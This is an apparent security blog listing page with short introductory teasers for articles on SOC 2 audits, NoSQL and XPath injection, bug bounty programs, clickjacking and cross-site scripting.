How to Pass a SOC 2 Audit

How to Pass a SOC 2 Audit

I often hear from people that audits are “brutal” and that passing a SOC 2 audit is a significant accomplishment. Most people I talk to feel that an audit is a burden and that passing it takes a lot of extra, unnecessary effort. At TCM Security, we...
Get Started with NoSQL Injection (NoSQLi)

Get Started with NoSQL Injection (NoSQLi)

Overview NoSQL databases, a term that stands for “Not Only SQL,” represent a shift from traditional relational databases. Unlike their SQL-based counterparts that rely heavily on tables and fixed schemas, NoSQL databases provide flexible storage...
XPath Injection: A Beginners Guide

XPath Injection: A Beginners Guide

Overview XPath Injection, akin to other common injection attacks, specifically targets vulnerabilities within an application’s user input processing system. But what sets XPath Injection apart is its exploitation of XPath queries. The fallout? Unauthorized...
Start your Journey with Bug Bounty

Start your Journey with Bug Bounty

Bug bounty programs have been a popular phenomenon in the tech industry for the last decade or so. They’re an opportunity for anyone to identify vulnerabilities in a company’s software or infrastructure and get rewarded for their discoveries. But, how do...
Clickjacking 101: What is Clickjacking and How Does it Work?

Clickjacking 101: What is Clickjacking and How Does it Work?

Clickjacking, also known as UI Redressing, is a technique that tricks users into clicking on unintended elements on a website. By using hidden elements, attackers deceive users into performing actions that they did not intend to carry out. Learn more about...
What is Cross-Site Scripting (XSS)?

What is Cross-Site Scripting (XSS)?

Overview Cross-Site Scripting (XSS) is a type of security vulnerability in web applications that enables an attacker to insert malicious code into a web page that can be viewed by other users (typically in the form of scripts). When a web application fails to properly...